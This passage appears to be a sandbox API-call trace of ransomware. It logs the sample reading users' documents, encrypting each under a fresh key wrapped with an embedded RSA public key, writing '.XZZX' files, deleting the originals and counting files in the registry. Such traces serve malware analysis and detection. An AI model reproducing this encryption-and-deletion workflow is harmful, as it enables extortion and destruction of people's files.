lpDistanceToMoveHigh=0x0) returned 0x8728 [0036.318] WriteFile (in: hFile=0x43c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.318] SetFilePointer (in: hFile=0x43c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x872d [0036.318] WriteFile (in: hFile=0x43c, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x20, lpOverlapped=0x0) returned 1 [0036.318] SetFilePointer (in: hFile=0x43c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x874d [0036.318] WriteFile (in: hFile=0x43c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.318] SetFilePointer (in: hFile=0x43c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8752 [0036.318] SetErrorMode (uMode=0x1) returned 0x1 [0036.318] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0036.318] OutputDebugStringW (lpOutputString="end") [0036.319] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0036.319] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0036.319] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3eb640) returned 1 [0036.319] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb640, dwCertEncodingType=0x1, pInfo=0x3dd1d88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1db8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1dc0*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x324df8) returned 1 [0036.319] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.320] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0036.320] CryptEncrypt (in: hKey=0x324df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0036.320] CryptEncrypt (in: hKey=0x324df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb6c8*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb6c8*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0036.320] WriteFile (in: hFile=0x43c, lpBuffer=0x3eb6c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3eb6c8*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0036.320] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0036.320] WriteFile (in: hFile=0x43c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.320] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0036.321] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0036.321] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x444) returned 0x0 [0036.321] RegQueryValueExW (in: hKey=0x444, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0x10, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0036.321] RegCloseKey (hKey=0x444) returned 0x0 [0036.321] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x444) returned 0x0 [0036.321] RegSetValueExW (in: hKey=0x444, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x11, cbData=0x4 | out: lpData=0x3f8dfec*=0x11) returned 0x0 [0036.321] RegCloseKey (hKey=0x444) returned 0x0 [0036.321] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.321] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.322] CloseHandle (hObject=0x43c) returned 1 [0036.323] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0036.323] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0036.323] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sRvP5V9AccV.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9srvp5v9accv.ods")) returned 1 [0036.324] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sRvP5V9AccV.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9srvp5v9accv.ods")) returned 0 Thread: id = 108 os_tid = 0x6f0 [0036.345] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.345] lstrcpyW (in: lpString1=0x3f8f460, lpString2="ASEJIISwQeKimcHMn.xlsx" | out: lpString1="ASEJIISwQeKimcHMn.xlsx") returned="ASEJIISwQeKimcHMn.xlsx" [0036.345] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.346] SetErrorMode (uMode=0x1) returned 0x1 [0036.346] lstrcpyW (in: lpString1=0x3f8f860, lpString2="ASEJIISwQeKimcHMn.xlsx" | out: lpString1="ASEJIISwQeKimcHMn.xlsx") returned="ASEJIISwQeKimcHMn.xlsx" [0036.346] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x29e66032, Data2=0xa8e0, Data3=0x4d21, Data4=([0]=0xb3, [1]=0x62, [2]=0x1, [3]=0xc9, [4]=0xda, [5]=0x96, [6]=0x47, [7]=0x44))) returned 0x0 [0036.346] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASEJIISwQeKimcHMn.xlsx") returned 66 [0036.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0036.346] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D8B4FBC032E124E029E6603236DA0928.XZZX") returned 81 [0036.346] StrStrW (lpFirst="ASEJIISwQeKimcHMn.xlsx", lpSrch="XZZX") returned 0x0 [0036.346] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASEJIISwQeKimcHMn.xlsx", dwFileAttributes=0x20) returned 1 [0036.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASEJIISwQeKimcHMn.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\asejiiswqekimchmn.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x440 [0036.346] ReadFile (in: hFile=0x440, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0xb200, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x3f8e418*=0xb200, lpOverlapped=0x0) returned 1 [0036.347] CloseHandle (hObject=0x440) returned 1 [0036.347] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0036.347] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0036.348] SetErrorMode (uMode=0x1) returned 0x1 [0036.348] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0036.348] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb750) returned 1 [0036.350] CryptGenKey (in: hProv=0x3eb750, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0036.432] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.432] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.432] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.433] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0036.433] CryptDestroyKey (hKey=0x324c38) returned 1 [0036.433] CryptReleaseContext (hProv=0x3eb750, dwFlags=0x0) returned 1 [0036.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D8B4FBC032E124E029E6603236DA0928.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d8b4fbc032e124e029e6603236da0928.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x440 [0036.434] WriteFile (in: hFile=0x440, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0xb200, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x3f8e438*=0xb200, lpOverlapped=0x0) returned 1 [0036.435] SetFilePointer (in: hFile=0x440, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb200 [0036.435] WriteFile (in: hFile=0x440, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.435] SetFilePointer (in: hFile=0x440, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb205 [0036.435] WriteFile (in: hFile=0x440, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x2c, lpOverlapped=0x0) returned 1 [0036.435] SetFilePointer (in: hFile=0x440, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb231 [0036.435] WriteFile (in: hFile=0x440, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.435] SetFilePointer (in: hFile=0x440, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb236 [0036.435] SetErrorMode (uMode=0x1) returned 0x1 [0036.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0036.435] OutputDebugStringW (lpOutputString="end") [0036.436] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0036.436] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0036.436] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3eb750) returned 1 [0036.436] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb750, dwCertEncodingType=0x1, pInfo=0x3dd1e58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1e88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1e90*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x324e38) returned 1 [0036.436] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.437] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0036.437] CryptEncrypt (in: hKey=0x324e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0036.437] CryptEncrypt (in: hKey=0x324e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb7d8*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb7d8*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0036.437] WriteFile (in: hFile=0x440, lpBuffer=0x3eb7d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3eb7d8*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0036.437] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0036.437] WriteFile (in: hFile=0x440, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.437] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0036.438] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0036.438] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x448) returned 0x0 [0036.438] RegQueryValueExW (in: hKey=0x448, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0x11, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0036.438] RegCloseKey (hKey=0x448) returned 0x0 [0036.438] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x448) returned 0x0 [0036.438] RegSetValueExW (in: hKey=0x448, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x12, cbData=0x4 | out: lpData=0x3f8dfec*=0x12) returned 0x0 [0036.438] RegCloseKey (hKey=0x448) returned 0x0 [0036.438] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.438] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.439] CloseHandle (hObject=0x440) returned 1 [0036.440] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0036.440] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0036.440] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASEJIISwQeKimcHMn.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\asejiiswqekimchmn.xlsx")) returned 1 [0036.441] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ASEJIISwQeKimcHMn.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\asejiiswqekimchmn.xlsx")) returned 0 Thread: id = 109 os_tid = 0x5dc [0036.501] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.501] lstrcpyW (in: lpString1=0x3f8f460, lpString2="B92naCEgJ.docx" | out: lpString1="B92naCEgJ.docx") returned="B92naCEgJ.docx" [0036.501] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.501] SetErrorMode (uMode=0x1) returned 0x1 [0036.501] lstrcpyW (in: lpString1=0x3f8f860, lpString2="B92naCEgJ.docx" | out: lpString1="B92naCEgJ.docx") returned="B92naCEgJ.docx" [0036.501] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0xc9ec733b, Data2=0xc635, Data3=0x4003, Data4=([0]=0xaa, [1]=0xb9, [2]=0xaf, [3]=0x49, [4]=0xf9, [5]=0x24, [6]=0x4, [7]=0x9c))) returned 0x0 [0036.501] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B92naCEgJ.docx") returned 58 [0036.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0036.501] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AF137D37318F929FC9EC733B358876E7.XZZX") returned 81 [0036.501] StrStrW (lpFirst="B92naCEgJ.docx", lpSrch="XZZX") returned 0x0 [0036.501] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B92naCEgJ.docx", dwFileAttributes=0x20) returned 1 [0036.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B92naCEgJ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b92nacegj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0036.502] ReadFile (in: hFile=0x444, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0xe581, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x3f8e418*=0xe581, lpOverlapped=0x0) returned 1 [0036.502] CloseHandle (hObject=0x444) returned 1 [0036.503] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0036.503] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0036.503] SetErrorMode (uMode=0x1) returned 0x1 [0036.503] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0036.503] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb860) returned 1 [0036.509] CryptGenKey (in: hProv=0x3eb860, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0036.660] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.660] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.660] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.661] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0036.661] CryptDestroyKey (hKey=0x324c38) returned 1 [0036.661] CryptReleaseContext (hProv=0x3eb860, dwFlags=0x0) returned 1 [0036.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AF137D37318F929FC9EC733B358876E7.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\af137d37318f929fc9ec733b358876e7.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0036.661] WriteFile (in: hFile=0x444, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0xe581, 